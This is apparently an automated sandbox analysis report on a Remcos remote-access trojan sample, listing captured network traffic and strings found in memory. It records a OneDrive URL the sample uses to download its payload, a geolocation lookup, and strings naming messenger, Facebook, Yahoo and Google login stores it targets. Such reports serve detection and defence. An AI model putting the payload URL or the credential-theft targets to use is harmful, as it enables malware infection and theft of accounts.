                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569662D Sleep,URLDownloadToFileW,0_2_1569662D
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: remcos.exe, 00000009.00000002.1583028383.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1631551774.0000000002328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: remcos.exe, 00000009.00000002.1583028383.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1631551774.0000000002328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: onedrive.live.com
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: fu56fbrtn8.exe, remcos.exe, 00000006.00000003.1523378434.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3845884495.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2205008076.0000000033696000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000071A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://geoplugin.net/json.gp
                      Source: fu56fbrtn8.exe, 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: remcos.exe, 00000006.00000003.1523378434.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3845884495.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2205008076.0000000033696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpL
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpL9
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpLL
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphB
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpoft
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0I
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0Q
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocsp.msocsp.com0S
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://ocspx.digicert.com0E
                      Source: bhv2770.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0~
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: remcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: remcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: remcos.exe, 00000009.00000002.1578803145.0000000000193000.00000004.00000010.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1627422473.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
                      Source: bhv2770.tmp.9.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhv2770.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: bhv2770.tmp.9.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
